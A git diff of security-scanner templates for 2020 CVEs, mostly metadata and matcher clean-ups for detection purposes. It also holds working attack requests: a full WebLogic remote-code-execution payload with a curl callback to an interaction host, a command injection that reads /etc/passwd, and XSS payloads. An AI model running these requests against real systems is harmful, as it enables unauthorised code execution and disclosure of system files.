+    From Airflow 1.10.11 forward, the default has been changed to deny all requests by default.  Note - this change fixes it for new installs but existing users need to change their config to default `[api]auth_backend = airflow.api.auth.backend.deny_all` as mentioned in the Updating Guide linked in the references.
   reference:
     - https://lists.apache.org/thread.html/r23a81b247aa346ff193670be565b2b8ea4b17ddbc7a35fc099c1aadd%40%3Cdev.airflow.apache.org%3E
     - http://packetstormsecurity.com/files/162908/Apache-Airflow-1.10.10-Remote-Code-Execution.html
+    - https://airflow.apache.org/docs/1.10.11/security.html#api-authenticatio
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-13927
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
@@ -17,7 +20,7 @@ info:
   metadata:
     verified: true
     shodan-query: title:"Airflow - DAGs" || http.html:"Apache Airflow"
-  tags: cve,cve2020,apache,airflow,unauth
+  tags: packetstorm,cve,cve2020,apache,airflow,unauth,auth-bypass,kev
 
 requests:
   - method: GET
@@ -26,8 +29,11 @@ requests:
 
     matchers:
       - type: word
+        part: body
         words:
           - '"dag_run_url":'
           - '"dag_id":'
           - '"items":'
         condition: and
+
+# Enhanced by mp on 2022/05/16
diff --git a/cves/2020/CVE-2020-13937.yaml b/cves/2020/CVE-2020-13937.yaml
index 9f346e68e7..53149fd717 100644
--- a/cves/2020/CVE-2020-13937.yaml
+++ b/cves/2020/CVE-2020-13937.yaml
@@ -4,11 +4,11 @@ info:
   name: Apache Kylin Exposed Configuration File
   author: pikpikcu
   severity: medium
-  description: Apache Kylin 2.0.0, 2.1.0, 2.2.0, 2.3.0, 2.3.1, 2.3.2, 2.4.0, 2.4.1, 2.5.0, 2.5.1, 2.5.2, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.6.4, 2.6.5, 2.6.6, 3.0.0-alpha, 3.0.0-alpha2, 3.0.0-beta, 3.0.0, 3.0.1,  3.0.2,
-    3.1.0, 4.0.0-alpha have one REST API which exposed Kylin's configuration information without authentication.
+  description: Apache Kylin 2.0.0, 2.1.0, 2.2.0, 2.3.0, 2.3.1, 2.3.2, 2.4.0, 2.4.1, 2.5.0, 2.5.1, 2.5.2, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.6.4, 2.6.5, 2.6.6, 3.0.0-alpha, 3.0.0-alpha2, 3.0.0-beta, 3.0.0, 3.0.1,  3.0.2, 3.1.0, 4.0.0-alpha have one REST API which exposed Kylin's configuration information without authentication.
   reference:
     - https://kylin.apache.org/docs/release_notes.html
     - https://s.tencent.com/research/bsafe/1156.html
+    - https://lists.apache.org/thread.html/rc592e0dcee5a2615f1d9522af30ef1822c1f863d5e05e7da9d1e57f4%40%3Cuser.kylin.apache.org%3E
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
     cvss-score: 5.3
diff --git a/cves/2020/CVE-2020-13942.yaml b/cves/2020/CVE-2020-13942.yaml
index fc103e4205..c7148c6357 100644
--- a/cves/2020/CVE-2020-13942.yaml
+++ b/cves/2020/CVE-2020-13942.yaml
@@ -1,18 +1,21 @@
 id: CVE-2020-13942
 
 info:
-  name: Apache Unomi Remote Code Execution
+  name: Apache Unomi <1.5.2 - Remote Code Execution
   author: dwisiswant0
   severity: critical
   description: |
-    Remote Code Execution in Apache Unomi.
     Apache Unomi allows conditions to use OGNL and MVEL scripting which
     offers the possibility to call static Java classes from the JDK
     that could execute code with the permission level of the running Java process.
-    This vulnerability affects all versions of Apache Unomi prior to 1.5.2. Apache Unomi users should upgrade to 1.5.2 or later.
+    This vulnerability affects all versions of Apache Unomi prior to 1.5.2.
   reference:
     - https://securityboulevard.com/2020/11/apache-unomi-cve-2020-13942-rce-vulnerabilities-discovered/
     - https://twitter.com/chybeta/status/1328912309440311297
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-13942
+    - http://unomi.apache.org./security/cve-2020-13942.txt
+    - https://lists.apache.org/thread.html/r4a8fa91836687eaca42b5420a778ca8c8fd3a3740e4cf4401acc9118@%3Cusers.unomi.apache.org%3E
+  remediation: Apache Unomi users should upgrade to 1.5.2 or later.
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
@@ -45,20 +48,24 @@ requests:
         ],
         "sessionId": "nuclei"
       }
+
     matchers-condition: and
     matchers:
-      - type: status
-        status:
-          - 200
-      - type: word
-        words:
-          - "application/json"
-          - "context-profile-id"
-        condition: and
-        part: header
       - type: regex
+        part: body
         regex:
           - "(profile|session)(Id|Properties|Segments)"
           - "[a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12}"
         condition: and
-        part: body
\ No newline at end of file
+
+      - type: word
+        part: header
+        words:
+          - "application/json"
+          - "context-profile-id"
+        condition: and
+
+      - type: status
+        status:
+          - 200
+# Enhanced by mp on 2022/05/16
diff --git a/cves/2020/CVE-2020-13945.yaml b/cves/2020/CVE-2020-13945.yaml
index fb2e373978..3f96e2b966 100644
--- a/cves/2020/CVE-2020-13945.yaml
+++ b/cves/2020/CVE-2020-13945.yaml
@@ -4,16 +4,17 @@ info:
   name: Apache APISIX's Admin API Default Access Token (RCE)
   author: pdteam
   severity: medium
-  description: In Apache APISIX, the user enabled the Admin API and deleted the Admin API access IP restriction rules. Eventually, the default token is allowed to access APISIX management data. This affects versions
-    1.2, 1.3, 1.4, 1.5.
+  description: In Apache APISIX, the user enabled the Admin API and deleted the Admin API access IP restriction rules. Eventually, the default token is allowed to access APISIX management data. This affects versions 1.2, 1.3, 1.4, 1.5.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2020-13945
     - https://github.com/vulhub/vulhub/tree/master/apisix/CVE-2020-13945
+    - https://lists.apache.org/thread.html/r792feb29964067a4108f53e8579a1e9bd1c8b5b9bc95618c814faf2f%40%3Cdev.apisix.apache.org%3E
+    - http://packetstormsecurity.com/files/166228/Apache-APISIX-Remote-Code-Execution.html
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 6.5
     cve-id: CVE-2020-13945
-  tags: cve,cve2020,apache,apisix,rce,intrusive
+  tags: rce,intrusive,vulhub,packetstorm,cve,cve2020,apache,apisix
 
 requests:
   - raw:
@@ -29,7 +30,7 @@ requests:
           "upstream":{
             "type":"roundrobin",
             "nodes":{
-              "example.com:80":1
+              "interact.sh:80":1
             }
           }
         }
diff --git a/cves/2020/CVE-2020-14092.yaml b/cves/2020/CVE-2020-14092.yaml
index 12a9047668..89bcafe298 100644
--- a/cves/2020/CVE-2020-14092.yaml
+++ b/cves/2020/CVE-2020-14092.yaml
@@ -4,7 +4,7 @@ info:
   name: WordPress PayPal Pro <1.1.65 - SQL Injection
   author: princechaddha
   severity: critical
-  description: "WordPress PayPal Pro plugin before 1.1.65 is susceptible to SQL injection via the 'query' parameter which allows for any unauthenticated user to perform SQL queries with the results output to a web page in JSON format."
+  description: WordPress PayPal Pro plugin before 1.1.65 is susceptible to SQL injection via the 'query' parameter which allows for any unauthenticated user to perform SQL queries with the results output to a web page in JSON format.
   reference:
     - https://wpscan.com/vulnerability/10287
     - https://wordpress.dwbooster.com/forms/payment-form-for-paypal-pro
@@ -14,7 +14,7 @@ info:
     cvss-score: 9.8
     cve-id: CVE-2020-14092
     cwe-id: CWE-89
-  tags: cve,cve2020,wordpress,wp-plugin,sqli,paypal
+  tags: wp-plugin,sqli,paypal,wpscan,cve,cve2020,wordpress
 
 requests:
   - method: GET
diff --git a/cves/2020/CVE-2020-14179.yaml b/cves/2020/CVE-2020-14179.yaml
index 85aa7656a6..b1d35fbac8 100644
--- a/cves/2020/CVE-2020-14179.yaml
+++ b/cves/2020/CVE-2020-14179.yaml
@@ -12,6 +12,8 @@ info:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
     cvss-score: 5.3
     cve-id: CVE-2020-14179
+  metadata:
+    shodan-query: http.component:"Atlassian Jira"
   tags: cve,cve2020,atlassian,jira,exposure,disclosure
 
 requests:
diff --git a/cves/2020/CVE-2020-14181.yaml b/cves/2020/CVE-2020-14181.yaml
index 4ad3b73fd1..03c15852b4 100644
--- a/cves/2020/CVE-2020-14181.yaml
+++ b/cves/2020/CVE-2020-14181.yaml
@@ -14,7 +14,9 @@ info:
     cvss-score: 5.3
     cve-id: CVE-2020-14181
     cwe-id: CWE-200
-  tags: cve,cve2020,atlassian,jira
+  metadata:
+    shodan-query: http.component:"Atlassian Jira"
+  tags: cve,cve2020,atlassian,jira,packetstorm
 
 requests:
   - method: GET
diff --git a/cves/2020/CVE-2020-14408.yaml b/cves/2020/CVE-2020-14408.yaml
new file mode 100644
index 0000000000..720c9bd013
--- /dev/null
+++ b/cves/2020/CVE-2020-14408.yaml
@@ -0,0 +1,42 @@
+id: CVE-2020-14408
+
+info:
+  name: Agentejo Cockpit 0.10.2 - Cross-Site Scripting
+  author: edoardottt
+  severity: medium
+  description: Agentejo Cockpit 0.10.2 contains a reflected cross-site scripting vulnerability due to insufficient sanitization of the to parameter in the /auth/login route, which allows for injection of arbitrary JavaScript code into a web page's content.
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2020-14408
+    cwe-id: CWE-79
+  reference:
+    - https://github.com/agentejo/cockpit/issues/1310
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-14408
+  metadata:
+    verified: true
+  tags: cve,cve2022,cockpit,agentejo,xss,oss
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/auth/login?to=/92874%27;alert(document.domain)//280"
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        part: body
+        words:
+          - "redirectTo = '/92874';alert(document.domain)//280';"
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/09/02
diff --git a/cves/2020/CVE-2020-14413.yaml b/cves/2020/CVE-2020-14413.yaml
index c1fef5a335..ade0545d95 100644
--- a/cves/2020/CVE-2020-14413.yaml
+++ b/cves/2020/CVE-2020-14413.yaml
@@ -1,13 +1,14 @@
 id: CVE-2020-14413
 
 info:
-  name: NeDi 1.9C XSS
+  name: NeDi 1.9C - Cross-Site Scripting
   author: pikpikcu
   severity: medium
-  description: NeDi 1.9C is vulnerable to XSS because of an incorrect implementation of sanitize() in inc/libmisc.php. This function attempts to escape the SCRIPT tag from user-controllable values, but can be easily
+  description: NeDi 1.9C is vulnerable to cross-site scripting because of an incorrect implementation of sanitize() in inc/libmisc.php. This function attempts to escape the SCRIPT tag from user-controllable values, but can be easily
     bypassed, as demonstrated by an onerror attribute of an IMG element as a Devices-Config.php?sta= value.
   reference:
     - https://gist.github.com/farid007/8db2ab5367ba00e87f9479b32d46fea8
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-14413
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -35,4 +36,6 @@ requests:
       - type: word
         part: header
         words:
-          - "text/html"
\ No newline at end of file
+          - "text/html"
+
+# Enhanced by mp on 2022/08/15
diff --git a/cves/2020/CVE-2020-14750.yaml b/cves/2020/CVE-2020-14750.yaml
new file mode 100644
index 0000000000..14f1c528fe
--- /dev/null
+++ b/cves/2020/CVE-2020-14750.yaml
@@ -0,0 +1,68 @@
+id: CVE-2020-14750
+
+info:
+  name: Oracle WebLogic Server - Remote Code Execution
+  author: princechaddha,DhiyaneshDk
+  severity: critical
+  description: |
+    This Security Alert addresses CVE-2020-14750, a remote code execution vulnerability in Oracle WebLogic Server.
+    This vulnerability is related to CVE-2020-14882, which was addressed in the October 2020 Critical Patch Update.
+    It is remotely exploitable without authentication, i.e., may be exploited over a network without the need for a username and password.
+  reference:
+    - https://github.com/pprietosanchez/CVE-2020-14750
+    - https://www.oracle.com/security-alerts/alert-cve-2020-14750.html
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14750
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-14750
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2020-14750
+  metadata:
+    shodan-query: http.html:"Weblogic Application Server"
+    verified: "true"
+  tags: cve,cve2020,rce,oracle,weblogic,unauth,kev
+
+requests:
+  - raw:
+      - |
+        @timeout: 10s
+        POST /console/css/%252e%252e%252fconsole.portal HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: curl/7.79.1
+        Accept: */*
+        cmd: curl {{interactsh-url}}
+        Content-Type: application/x-www-form-urlencoded
+
+        _nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread();
+        weblogic.work.WorkAdapter adapter = executeThread.getCurrentWork();
+        java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");
+        field.setAccessible(true);
+        Object obj = field.get(adapter);
+        weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) obj.getClass().getMethod("getServletRequest").invoke(obj);
+        String cmd = req.getHeader("cmd");
+        String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};
+        if (cmd != null) {
+            String result = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter("\\A").next();
+            weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl) req.getClass().getMethod("getResponse").invoke(req);
+            res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));
+            res.getServletOutputStream().flush();
+            res.getWriter().write("");
+        }executeThread.interrupt();
+        ");
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol   # Confirms DNS Interaction
+        words:
+          - "dns"
+
+      - type: word
+        part: header
+        words:
+          - "ADMINCONSOLESESSION="
+
+      - type: regex
+        part: body
+        regex:
+          - '<html><head></head><body>(.*)</body></html>'
diff --git a/cves/2020/CVE-2020-14864.yaml b/cves/2020/CVE-2020-14864.yaml
index 484e3d87c1..dc197994c8 100644
--- a/cves/2020/CVE-2020-14864.yaml
+++ b/cves/2020/CVE-2020-14864.yaml
@@ -1,18 +1,19 @@
 id: CVE-2020-14864
 
 info:
-  name: Oracle Fusion - "getPreviewImage" Directory Traversal/Local File Inclusion
+  name: Oracle Fusion - Directory Traversal/Local File Inclusion
   author: Ivo Palazzolo (@palaziv)
   severity: high
-  description: Oracle Business Intelligence Enterprise Edition 5.5.0.0.0 / 12.2.1.3.0 / 12.2.1.4.0 - "getPreviewImage" Directory Traversal/Local File Inclusion
+  description: Oracle Business Intelligence Enterprise Edition 5.5.0.0.0, 12.2.1.3.0, and 12.2.1.4.0 are vulnerable to local file inclusion vulnerabilities via "getPreviewImage."
   reference:
     - http://packetstormsecurity.com/files/159748/Oracle-Business-Intelligence-Enterprise-Edition-5.5.0.0.0-12.2.1.3.0-12.2.1.4.0-LFI.html
     - https://www.oracle.com/security-alerts/cpuoct2020.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-14864
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2020-14864
-  tags: cve,cve2020,oracle,lfi
+  tags: cve,cve2020,oracle,lfi,kev,packetstorm
 
 requests:
   - method: GET
@@ -28,4 +29,6 @@ requests:
       - type: regex
         regex:
           - 'root:.*:0:0:'
-        part: body
\ No newline at end of file
+        part: body
+
+# Enhanced by mp on 2022/07/13
diff --git a/cves/2020/CVE-2020-14882.yaml b/cves/2020/CVE-2020-14882.yaml
index 77a02b6920..86ac0c5e8c 100644
--- a/cves/2020/CVE-2020-14882.yaml
+++ b/cves/2020/CVE-2020-14882.yaml
@@ -16,7 +16,7 @@ info:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2020-14882
-  tags: cve,cve2020,oracle,rce,weblogic,oast
+  tags: cve,cve2020,oracle,rce,weblogic,oast,kev
 
 requests:
   - method: GET
diff --git a/cves/2020/CVE-2020-14883.yaml b/cves/2020/CVE-2020-14883.yaml
index fb1a8fafe4..bee6ab6260 100644
--- a/cves/2020/CVE-2020-14883.yaml
+++ b/cves/2020/CVE-2020-14883.yaml
@@ -4,16 +4,17 @@ info:
   name: Oracle Fusion Middleware WebLogic Server Administration Console - Remote Code Execution
   author: pdteam
   severity: high
-  description: The Oracle Fusion Middleware WebLogic Server admin console in versions 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0 is vulnerable to an easily exploitable vulnerability that allows
-    high privileged attackers with network access via HTTP to compromise Oracle WebLogic Server.
+  description: The Oracle Fusion Middleware WebLogic Server admin console in versions 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0 is vulnerable to an easily exploitable vulnerability that allows high privileged attackers with network access via HTTP to compromise Oracle WebLogic Server.
   reference:
     - https://packetstormsecurity.com/files/160143/Oracle-WebLogic-Server-Administration-Console-Handle-Remote-Code-Execution.html
     - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14883
+    - https://www.oracle.com/security-alerts/cpuoct2020.html
+    - http://packetstormsecurity.com/files/160143/Oracle-WebLogic-Server-Administration-Console-Handle-Remote-Code-Execution.html
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 7.2
     cve-id: CVE-2020-14883
-  tags: cve,cve2020,oracle,rce,weblogic
+  tags: oracle,rce,weblogic,kev,packetstorm,cve,cve2020
 
 requests:
   - raw:
diff --git a/cves/2020/CVE-2020-15050.yaml b/cves/2020/CVE-2020-15050.yaml
index 57e371f815..141a14c32c 100644
--- a/cves/2020/CVE-2020-15050.yaml
+++ b/cves/2020/CVE-2020-15050.yaml
@@ -1,19 +1,20 @@
 id: CVE-2020-15050
 
 info:
-  name: Suprema BioStar2 - Local File Inclusion (LFI)
+  name: Suprema BioStar <2.8.2 - Local File Inclusion
   author: gy741
   severity: high
-  description: An issue was discovered in the Video Extension in Suprema BioStar 2 before 2.8.2. Remote attackers can read arbitrary files from the server via Directory Traversal.
+  description: Suprema BioStar before 2.8.2 Video Extension allows remote attackers can read arbitrary files from the server via local file inclusion.
   reference:
     - http://packetstormsecurity.com/files/158576/Bio-Star-2.8.2-Local-File-Inclusion.html
     - https://www.supremainc.com/en/support/biostar-2-pakage.asp
     - https://nvd.nist.gov/vuln/detail/CVE-2020-15050
   classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2020-15050
-  tags: cve,cve2020,lfi,suprema,biostar2
+    cwe-id: CWE-22
+  tags: suprema,biostar2,packetstorm,cve,cve2020,lfi
 
 requests:
   - method: GET
@@ -28,3 +29,5 @@ requests:
           - "fonts"
           - "extensions"
         condition: and
+
+# Enhanced by mp on 2022/07/13
diff --git a/cves/2020/CVE-2020-15129.yaml b/cves/2020/CVE-2020-15129.yaml
index ba9f538db5..2f13517b4a 100644
--- a/cves/2020/CVE-2020-15129.yaml
+++ b/cves/2020/CVE-2020-15129.yaml
@@ -4,10 +4,12 @@ info:
   name: Open-redirect in Traefik
   author: dwisiswant0
   severity: medium
-  description: There exists a potential open redirect vulnerability in Traefik's handling of the X-Forwarded-Prefix header. Active Exploitation of this issue is unlikely as it would require active header injection,
-    however the Traefik team may want to address this issue nonetheless to prevent abuse in e.g. cache poisoning scenarios.
+  description: There exists a potential open redirect vulnerability in Traefik's handling of the X-Forwarded-Prefix header. Active Exploitation of this issue is unlikely as it would require active header injection, however the Traefik team may want to address this issue nonetheless to prevent abuse in e.g. cache poisoning scenarios.
   reference:
     - https://securitylab.github.com/advisories/GHSL-2020-140-Containous-Traefik
+    - https://github.com/containous/traefik/releases/tag/v2.2.8
+    - https://github.com/containous/traefik/pull/7109
+    - https://github.com/containous/traefik/security/advisories/GHSA-6qq8-5wq3-86rp
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 4.7
diff --git a/cves/2020/CVE-2020-15148.yaml b/cves/2020/CVE-2020-15148.yaml
index d404fae92d..7442e9ee7b 100644
--- a/cves/2020/CVE-2020-15148.yaml
+++ b/cves/2020/CVE-2020-15148.yaml
@@ -4,16 +4,18 @@ info:
   name: Yii 2 < 2.0.38 - Remote Code Execution
   author: pikpikcu
   severity: critical
-  description: "Yii 2 (yiisoft/yii2) before version 2.0.38 is vulnerable to remote code execution if the application calls `unserialize()` on arbitrary user input."
+  description: Yii 2 (yiisoft/yii2) before version 2.0.38 is vulnerable to remote code execution if the application calls `unserialize()` on arbitrary user input.
   reference:
     - https://blog.csdn.net/xuandao_ahfengren/article/details/111259943
     - https://github.com/nosafer/nosafer.github.io/blob/227a05f5eff69d32a027f15d6106c6d735124659/docs/Web%E5%AE%89%E5%85%A8/Yii2/%EF%BC%88CVE-2020-15148%EF%BC%89Yii2%E6%A1%86%E6%9E%B6%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E.md
+    - https://github.com/yiisoft/yii2/commit/9abccb96d7c5ddb569f92d1a748f50ee9b3e2b99
+    - https://github.com/yiisoft/yii2/security/advisories/GHSA-699q-wcff-g9mj
+  remediation: Upgrade to version 2.0.38 or later. A possible workaround without upgrading is available in the linked advisory.
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
-    cvss-score: 10.0
+    cvss-score: 10
     cve-id: CVE-2020-15148
     cwe-id: CWE-502
-  remediation: Upgrade to version 2.0.38 or later. A possible workaround without upgrading is available in the linked advisory.
   tags: cve,cve2020,rce,yii
 
 requests:
diff --git a/cves/2020/CVE-2020-15227.yaml b/cves/2020/CVE-2020-15227.yaml
index d9d0cdfe51..6384513e85 100644
--- a/cves/2020/CVE-2020-15227.yaml
+++ b/cves/2020/CVE-2020-15227.yaml
@@ -4,7 +4,7 @@ info:
   name: Nette Framework - Remote Code Execution
   author: becivells
   severity: critical
-  description: "Nette Framework versions before 2.0.19, 2.1.13, 2.2.10, 2.3.14, 2.4.16, and 3.0.6 are vulnerable to a code injection attack via specially formed parameters being passed to a URL. Nette is a PHP/Composer MVC Framework."
+  description: Nette Framework versions before 2.0.19, 2.1.13, 2.2.10, 2.3.14, 2.4.16, and 3.0.6 are vulnerable to a code injection attack via specially formed parameters being passed to a URL. Nette is a PHP/Composer MVC Framework.
   reference:
     - https://github.com/nette/application/security/advisories/GHSA-8gv3-3j7f-wg94
     - https://www.pwnwiki.org/index.php?title=CVE-2020-15227_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E#
diff --git a/cves/2020/CVE-2020-15500.yaml b/cves/2020/CVE-2020-15500.yaml
index f9603e36c1..f28fdc107d 100644
--- a/cves/2020/CVE-2020-15500.yaml
+++ b/cves/2020/CVE-2020-15500.yaml
@@ -1,19 +1,20 @@
 id: CVE-2020-15500
 
 info:
-  name: TileServer GL Reflected XSS
+  name: TileServer GL <=3.0.0 - Cross-Site Scripting
   author: Akash.C
   severity: medium
-  description: An issue was discovered in server.js in TileServer GL through 3.0.0. The content of the key GET parameter is reflected unsanitized in an HTTP response for the application's main page, causing reflected XSS.
+  description: TileServer GL through 3.0.0 is vulnerable to reflected cross-site scripting via server.js  because the content of the key GET parameter is reflected unsanitized in an HTTP response for the application's main page.
   reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2020-15500
     - https://github.com/maptiler/tileserver-gl/issues/461
+    - http://packetstormsecurity.com/files/162193/Tileserver-gl-3.0.0-Cross-Site-Scripting.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-15500
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2020-15500
     cwe-id: CWE-79
-  tags: cve,cve2020,xss,tileserver
+  tags: cve,cve2020,xss,tileserver,packetstorm
 
 requests:
   - method: GET
@@ -34,4 +35,6 @@ requests:
       - type: word
         words:
           - "'>\"<svg/onload=confirm('xss')>"
-        part: body
\ No newline at end of file
+        part: body
+
+# Enhanced by mp on 2022/08/15
diff --git a/cves/2020/CVE-2020-15505.yaml b/cves/2020/CVE-2020-15505.yaml
index 684d471819..5f09dcccb2 100644
--- a/cves/2020/CVE-2020-15505.yaml
+++ b/cves/2020/CVE-2020-15505.yaml
@@ -9,7 +9,7 @@ info:
   name: MobileIron Core & Connector <= v10.6 & Sentry <= v9.8 - Remote Code Execution
   author: dwisiswant0
   severity: critical
-  description: "A remote code execution vulnerability in MobileIron Core & Connector versions 10.3.0.3 and earlier, 10.4.0.0, 10.4.0.1, 10.4.0.2, 10.4.0.3, 10.5.1.0, 10.5.2.0 and 10.6.0.0; and Sentry versions 9.7.2 and earlier, and 9.8.0; and Monitor and Reporting Database (RDB) version 2.0.0.1 and earlier contain a vulnerability that allows remote attackers to execute arbitrary code via unspecified vectors."
+  description: A remote code execution vulnerability in MobileIron Core & Connector versions 10.3.0.3 and earlier, 10.4.0.0, 10.4.0.1, 10.4.0.2, 10.4.0.3, 10.5.1.0, 10.5.2.0 and 10.6.0.0; and Sentry versions 9.7.2 and earlier, and 9.8.0; and Monitor and Reporting Database (RDB) version 2.0.0.1 and earlier contain a vulnerability that allows remote attackers to execute arbitrary code via unspecified vectors.
   reference:
     - https://blog.orange.tw/2020/09/how-i-hacked-facebook-again-mobileiron-mdm-rce.html
     - https://github.com/iamnoooob/CVE-Reverse/tree/master/CVE-2020-15505
@@ -20,7 +20,7 @@ info:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2020-15505
-  tags: cve,cve2020,mobileiron,rce,sentry
+  tags: cve,cve2020,mobileiron,rce,sentry,kev
 
 requests:
   - raw:
diff --git a/cves/2020/CVE-2020-15568.yaml b/cves/2020/CVE-2020-15568.yaml
index 22b7b9f2fd..6204edee14 100644
--- a/cves/2020/CVE-2020-15568.yaml
+++ b/cves/2020/CVE-2020-15568.yaml
@@ -4,10 +4,11 @@ info:
   name: TerraMaster TOS <.1.29 - Remote Code Execution
   author: pikpikcu
   severity: critical
-  description: "TerraMaster TOS before 4.1.29 has invalid parameter checking that leads to code injection as root. This is a dynamic class method invocation vulnerability in include/exportUser.php, in which an attacker can trigger a call to the exec method with (for example) OS commands in the opt parameter."
+  description: TerraMaster TOS before 4.1.29 has invalid parameter checking that leads to code injection as root. This is a dynamic class method invocation vulnerability in include/exportUser.php, in which an attacker can trigger a call to the exec method with (for example) OS commands in the opt parameter.
   reference:
     - https://ssd-disclosure.com/ssd-advisory-terramaster-os-exportuser-php-remote-code-execution/
     - https://nvd.nist.gov/vuln/detail/CVE-2020-15568
+    - https://help.terra-master.com/TOS/view/
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
diff --git a/cves/2020/CVE-2020-15920.yaml b/cves/2020/CVE-2020-15920.yaml
index 2ba0ada4d8..fe5fa21964 100644
--- a/cves/2020/CVE-2020-15920.yaml
+++ b/cves/2020/CVE-2020-15920.yaml
@@ -1,29 +1,35 @@
 id: CVE-2020-15920
 
 info:
-  name: Unauthenticated RCE at Mida eFramework on 'PDC/ajaxreq.php'
+  name: Mida eFramework <=2.9.0 - Remote Command Execution
   author: dwisiswant0
   severity: critical
-  description: There is an OS Command Injection in Mida eFramework through 2.9.0 that allows an attacker to achieve Remote Code Execution (RCE) with administrative (root) privileges. No authentication is required.
+  description: Mida eFramework through 2.9.0 allows an attacker to achieve remote code execution with administrative (root) privileges. No authentication is required.
   reference:
     - https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html
+    - http://packetstormsecurity.com/files/158991/Mida-eFramework-2.9.0-Remote-Code-Execution.html
+    - http://packetstormsecurity.com/files/159194/Mida-Solutions-eFramework-ajaxreq.php-Command-Injection.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-15920
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2020-15920
     cwe-id: CWE-78
-  tags: cve,cve2020,mida,rce
+  tags: cve,cve2020,mida,rce,packetstorm
 
 requests:
   - method: POST
     path:
       - "{{BaseURL}}/PDC/ajaxreq.php?PARAM=127.0.0.1+-c+0%3B+cat+%2Fetc%2Fpasswd&DIAGNOSIS=PING"
+
     matchers-condition: and
     matchers:
+      - type: regex
+        part: body
+        regex:
+          - "root:.*:0:0:"
+
       - type: status
         status:
           - 200
-      - type: regex
-        regex:
-          - "root:.*:0:0:"
-        part: body
+# Enhanced by mp on 2022/05/16
